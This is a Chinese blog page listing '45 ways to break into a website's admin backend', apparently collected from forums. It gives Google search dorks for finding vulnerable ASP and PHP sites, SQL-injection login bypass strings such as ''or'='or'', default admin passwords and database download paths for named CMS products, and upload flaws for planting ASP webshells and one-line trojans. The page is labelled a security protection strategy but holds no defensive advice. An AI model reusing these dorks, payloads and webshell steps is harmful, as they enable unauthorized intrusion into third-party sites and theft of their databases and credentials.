45种攻入网站后台的方法【安全防护策略】

利用web漏洞入侵网站并控制服务器、Web漏洞原理与利用 经过本次实验,我深刻了解了网络无安全这句话,了解了端口扫描和漏洞扫描,并掌握了多种软件的使用,掌握了端口及漏洞扫描的一些基本知识,掌握一些网络入侵的基本流程,并且让我可以了解到远程主机所存在的一些问题。2、选择Options-Configuration命令,此时打开Options对话框,在这里可以设置扫描属性,包括扫描时延、线程优先级、线程数量、扫描IP/Port列表设置等选项。应用池程序 --defaultapppool--高级设置--常规--启用32位应用程序--True。 阅读详情
45种攻入后台的方法
1、到Google搜索,site:cq.cn inurl:asp
2、到Google,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!
3、利用挖掘鸡和一个ASP木马:
文件名是login.asp

……


获取【下载地址】 

路径组是/manage/
关键词是went.asp
用’or’=‘or’来登陆
4、以下这个方法因为太多人做过,所以一些网站管理员对此都有防范之心了,成功率不高:
关键字:“Co Net MIB Ver 1.0网站后台管理系统”
帐号密码为 ‘or’=‘or’
5、动感购物系统,呵呵。想到了明小子:
inurl:help.asp登陆,如未注册成为会员!
upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞。
6、默认数据库地址blogdata/acblog.asa
关键字:acblog
7、百度 /htdocs
注册里可以直接上传asa文件!
8、/Database/#newasp.mdb
关键词:NewAsp SiteManageSystem Version
9、用挖掘机
关键字:Powered by WEBBOY
页面:/upfile.asp
10、baidu中搜索关键字Ver5.0 Build 0519
(存在上传漏洞)
11、Upfile_Article.asp bbs/upfile.asp
输入关键字:powered by mypower ,
应该是动什么上传漏洞来着?用的人也比较多
估计明小子,挖掘鸡就可以了
12、inurl:winnt\system32\inetsrv\
在google里面输入这个就可以找到很多网站
13、现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp
14、关键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买站内流言友情连接 本站论坛
挖掘鸡的关键字 添 setup.asp
15、VBulletin论坛的数据库
默认数据库地址!
/includes/functions.php
工具:
1)网站猎手。下载地址:百度 Google!
2)Google
关键字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一个就可以了
16
1)打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart
open source。
这是一个商场系统。
2)网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
猜到,comersus.mdb. 是数据库名
数据库都是放在database/ 后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
那样把前一个’’store/”除去,再加上database/comersus.mdb 试试
都是默认数据库地址
17、无忧传奇官方站点程序。
1)后台管理地址:http://您的域名/msmiradmin/
或者是 http://您的域名/admin.asp
2)默认后台管理帐号:msmir
3)默认后台管理密码:msmirmsmir 或 msmir
数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
或者是 http://您的域名/msmirdata/msmirArticle.asa
数据库连接文件为 ***********/Conn.asp
也是默认数据库地址。 现在传奇4F好多都是这个。呵呵我刚还没事搞了个呢`
18、百度里输入/skins/default/
19、利用挖掘机
关键机:power by Discuz
路径:/wish.php
配合:
Discuz!论坛 wish.php远程包含漏洞
……
20、上传漏洞.
工具 : 当然还是明小子了
网站猎手 或者挖掘鸡了。
关键字powered by mypower
检测的页面或文件插入upfile_photo.asp
这个用的人也N多。。
21、新云漏洞
这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 “关于本站 – 网站帮助 – 广告合作 – 下载声明 – 友情连接 – 网站地图 – 管理登录”
把flash/downfile.asp?url=uploadfile/http://www.cnblogs.com/conn.asp提交到网站根目录。就可以下载conn.asp
以源码,软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用#替换就可以下载了
\database\#newasp.mdb
如:#xzws.mdb 改成#xzws.mdb
收集的。没试过。。。 – -!
22、通吃所有商城+动力上传系统
使用工具:挖掘鸡 v1.1 明小子
商城入侵:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp
还是上传漏洞拿webshell
23、注射漏洞
百度搜索ioj’s blog
24、动易
列目录
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
25、
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:’or’=‘or’
这软件还不是太熟悉。 – -
26、
入侵魔兽私服
需要的工具:ASP木马 – -!废话了。
明小子
关键字:All Right Reserved Design:游戏联盟
后台地址:admin/login.asp
数据库的地址:chngame/#chngame.mdb
都默认的。数据库闹下来自己解密吧不多说了。
27、
漏洞是利用管理员iis设置的失误
用baidu 关键字就是比较罕见的脚本名
动网: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
动易: admin_articlerecyclebin.asp
好像比较少吧不太清楚了这个。。
28、
国外站的爆库漏洞
关键字:sad Raven’s Guestbook
密码地址:/passwd.dat
后台地址:/admin.php
29、
Discuz 4.1.0跨站漏洞
利用工具:1)WAP浏览器
2)WAP编码转换器
关键字:”intextiscuz! 4.1.0″
WAP浏览器…………………………!!
30、
关键字:尚奈克斯
后台路径/system/manage.asp
直接传ASP木马
挖掘机去。。 – -!
31、
工具
1:网站猎手
2:大马
关键字:切勿关闭Cookies功能,否则您将不能登录
插入diy.asp
32、
关键字:Team5 Studio All rights reserved
默认数据库:data/team.mdb
剩下的自己搞。不多说了
33、
工具: 挖掘机 辅臣数据库读取器
关键字: 企业简介 产品展示 产品列表
后缀添加: /database/myszw.mdb
后台地址: admin/Login.asp
都默认的。一样。数据库闹下来自己解密码去 。就行了。。 – -
34、
关键子 XXX inurl:Nclass.asp
……
在”系统设置”里写个木马。
会被保存到 在 config.asp内。
35、
不进后台照样拿动网WEBSHELL
data.asp?action=BackupData 动网数据库备份默认路径
没试过。。。不知道。
36、
工具:网站猎手 WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:’or’=‘or’
也没试过。 。。。。。。
37、
关键字owered byCDN_NEWS
随便扫遍文章加一个’ ,来试探注入点
后台地址:admin_index.asp
用啥工具我就不说了吧。。。。。。。。。
38、
入侵雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上传马…..
进访问uppic anran.asp 登陆马.
—-
没试过。汗 ,收集来的。
39、
工具挖掘机就行了。
关键字ower System Of Article Management Ver 3.0 Build 20030628
默认数据库:database\yiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!
工具明小子。- -!怎么又是他啊。
MD5自己解………
(NND这个一扫一大堆。大家可以去试试。。)
40、
一、通过GOOGLE搜索找大量注入点
关键字:asp?id=1 gov.jp/ asp?id=
页数:100
语言:想入侵哪个国家就填什么语言吧
41、
关键字:Powered by:94KKBBS 2005
利用密码找回功能 找回admin
提问:ddddd 回答:ddddd
42、
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码: ‘or’=’ 或者 ‘or”=”or’ 登录 进入
默认数据库地址atabase/DataShop.mdb
43、
关键字:****** inurl:readnews.asp
把最后一个/改成\ ,直接暴库,看密码,进后台
随便添加个新闻 在标题输入我们的一句话木马
44、
工具:一句话木马
BBsXp 5.0 sp1 管理员猜解器
关键词:powered by bbsxp5.00
进后台,备份一句话马!
45、
关键字:程序核心:BJXSHOP网上开店专家
后台:/admin
网站后台管理系统 立即下载

相关推荐

基础网站后台

基础网站后台

R以及Rstudio超详细安装教程(包括安装过程中出现的问题)

R安装及Rstudio安装,以及安装中出现的问题

2301_76908257的博客 1万+

入侵php网站后台管理系统,caozha-admin(PHP网站后台管理框架)

caozha-admin是一个通用的PHP网站后台管理框架,基于开源的ThinkPHP开发,特点:易上手,零门槛,界面清爽极简,极便于二次开发。基础功能1、系统设置2、管理员管理3、权限组管理4、系统日志5、后台功能地图6、整合了百度UEditor等各种常用插件,可去演示页面查看调用。7、无限级别分类8、文章管理系统9、用户(会员)管理系统10、评论系统(支持盖楼评论,支持设置屏蔽词、验证码、是否...

weixin_31632707的博客 1349

黑客一般通过什么式入侵网站?

网站后台登录链接一般是黑客入侵的大门,暴露网站的登录url,就会给网站造成较为严重的安全隐患,因为无论你是使用PHP还是其他语言开发网站系统,黑客一般都是利用后台文件进行击(如图片上传、数据库写入等方法)。1、头部或底部导航栏直接链接了后台登录界面:这是很多网站管理员为了自己便而设置,危险等级5颗星,建议立马去掉,关闭黑客入侵大门。

m0_59598029的博客 1781

为什么服务器被击后后台也会被黑客入侵

服务器被击后,后台管理系统容易被入侵的原因主要包括权限过高、安全漏洞、弱口令和默认设置、配置不当、缺乏监控和审计等。通过加强身份验证、及时更新和打补丁、配置防火墙、使用安全插件和扩展、日志管理和监控、权限管理、备份和恢复等措施,可以有效预防和应对黑客击,保护服务器的安全。

@云安全小杜 1037

【谨慎学习】手把手教你破解网站管理后台帐号密码

对于网站运行的个人站长而言,最担心的是应如何有效且安全的去管理自己的网站,否则自己辛辛苦苦经营的网站就会被不请自来的不速之客给破,轻则站点数据被窃取,重则整个网站都被陷,导致无法恢复。本文主要从管理后台这个面来讲解其黑客击过程,并通过在虚拟环境中展开实例演示,各读者可以跟着本教程去做实验,通过实验加强对击过程的了解,如果你是一名菜鸟站长也可以针对性的去做一下防护案。

Innocence_0的博客 8100

渗透测试 |记一次黑入盗号网站后台

某学校群聊又有人被骗了,发了类似这样的内容,点进去一看就是伪装成QQ邮箱或者QQ空间后台网站,骗取QQ号码。随便填写账号密码后,有一个假的学籍查询表单,让你填一些敏感信息啥的(黑入后台后发现居然真有人写了,汗)。突然心生一意:要不试试SQL注入看看?1过程直接浏览器F12,点开网络,然后随便输个账号密码,点登录,就抓到登录接口了。负载payload里可以看到请求的参数为u、p、step三个参数,此处图片就不展示了。

Python84310366的博客 4722

从弱口令到拿下站群服务器

喜欢就关注我吧,订阅更多最新消息本文涉及知识点实操练习-DoraBox之文件上传https://www.hetianlab.com/expc.do?ec=ECIDfaf3-05da-...

蚁景网安学院 721

APP/网站 后台被渗透入侵了怎么办?

总之,当APP/网站后台被渗透入侵时,我们需要及时发现、隔离、分析、清除、修复和加固系统,并加强安全防护措施和应急响应机制。只有这样,才能有效应对黑客击和恶意入侵,保障系统的安全和稳定。同时,我们还需要不断学习和更新安全知识,提高防范能力和应对能力,以应对不断变化的网络安全威胁。一旦APP或网站后台被渗透入侵,可能会导致数据泄露、系统崩溃、恶意篡改等严重后果。同时,还需要建立专业的安全团队,负责安全事件的监测、分析和处置。同时,还需要加强系统监控和日志记录,及时发现和应对潜在的安全威胁。

恒创科技Henghost 1105

暴力破解网站后台burpsuite

【实验原理】 Burp Suite是Web应用程序测试的最佳工具之一,其多种功能执行各种任务。请求的拦截和修改,扫描web应用程序漏洞,以暴力破解登录表单,执行会话令牌等多种的随机性检查。 Burp Suite主要有它的以下特点: 1.Proxy(代理)-Burp Suite带有一个代理,通过默认端口8080上运行,使用这个代理,我们可以截获并修改从客户端到web应用程序的数据包。 2.S...

whatiwhere的博客 8526

网站***总结

一***.***的方法有很多.上傳.注入(DB.SA).旁注.暴库.COOKIE诈骗..等.後台or=or.動網.動易.等BGU能過這些方法都能拿到很多WEBSELL.要***.先得了解BUG形成的原理.時間有限.網上找了幾篇【导读】什么样的站点可以***?必须是动态的网站,比如asp、php、jsp 这种形式的站点,***式: 1、上传漏洞;2、暴库;3、注入;4、旁注;...

weixin_33769125的博客 1147

45方法攻入后台

1、到Google搜索,site:cq.cn inurl:asp 2、到Google,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 3、利用挖掘鸡和一个ASP木马: 文件名是login.asp …… 路径组是/manage/ 关键词是went.asp 用’or’='or’来登陆 4、以下这个方法因为太多人做过,所以一些网站管理员对此都有防范之心了,成功率不高: 关键字:“Co Net MIB Ver 1.0网站后台管理系统” 帐号密码为 ‘or’='or’ 5、动感购物系统,呵

java_java_cl的博客 9690

wireshark密码嗅探侵入后台管理系统

背景: 后台管理系统仅为内网使用并与资金流转息息相关,但是为http协议传输,且用户名密码没有加密,遂想尝试获取其他用户的用户名密码并突破内网侵入后台管理系统; 思路: 1:本机开启WiFi热点,使用wireshark混杂模式监听对应网卡,待目标用户连接WIFI,并执行登录后台操作后获取用户名密码 2:为便在家办公,公司开启了VPN远程连接内网,VPN账号用户名按既定规则生成,密码为八位...

zhusongziye的博客 5281

【Web爆破击实战】真正的黑客 是怎样进入目标后台的?

在很多情况下,黑客在找不到其他途径进入 Web 管理后台时,就会采用暴力破解的式来破解后台管理员的账号和密码。所谓暴力破解,就是使用“穷举法”,对用户名和密码进行逐个猜解,直至猜出来为止。虽然暴力破解显得不是很有技术含量,但确实最有效的一种式。理论上来说,只要时间足够,终究会把用户名和密码猜解出来。为了提高暴力破解的效率,一般在破解时,都会使用字典。所谓字典,就是黑客会把自己认为的有可能是正确的密码,以及曾经碰到过的密码,写到一个文档里去,这个文档就是字典。

jennycisp的博客 4263

45攻入后台方法(非原创,来自伟大的网络)

45攻入后台方法(非原创,来自伟大的网络)1、到Google搜索,site:cq.cn inurl:asp2、到Google,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!3、利用挖掘鸡和一个ASP木马:文件名是login.asp……路径组是/manage/关键词是went.asp用’or’='or’来登陆4、以下这个方法因为太多人做过,所以一些网站管理员对此都有防...

tiwsonchen的博客 6277

有手就行:零基础渗透网站步骤

前言:渗透技巧小总结,希望大家喜欢! 渗透技巧 1.拿到一个网站后,先进行扫描,对网站全局进行爬行。 2.某些cms的网站设置过滤不严,直接在网站后面加上admin/session.asp 或 admin/left.asp 可直接进入后台 3.入侵网站之前连接下3389,可以连接上的话先尝试弱口令,不行就按5次shift键,看看有没有shift后门 4.访问后台地址时弹出提示框“请登陆” 把地址记出来(复制不了)放到“网页源代码分析器”里,选择浏览器-拦截跳转勾选–查看即可直接进入后台。 5.:jav.

jklbnm12的博客 3万+

入侵网站后台

有什么办法入侵网站后台

qq_58747123的博客 543

黑客的入侵式你知道几种?

零基础入门对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的向学习准没问题。CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享 (qq.com)CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享 (qq.com)因篇幅有限,仅展示部分资料,需要点击上链接即可获取。

weixin_68789096的博客 1886
上一篇: ECharts Java 动态加载数据,echartsjava
yunhaisss
博客等级 码龄11年 5粉丝 3原创
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值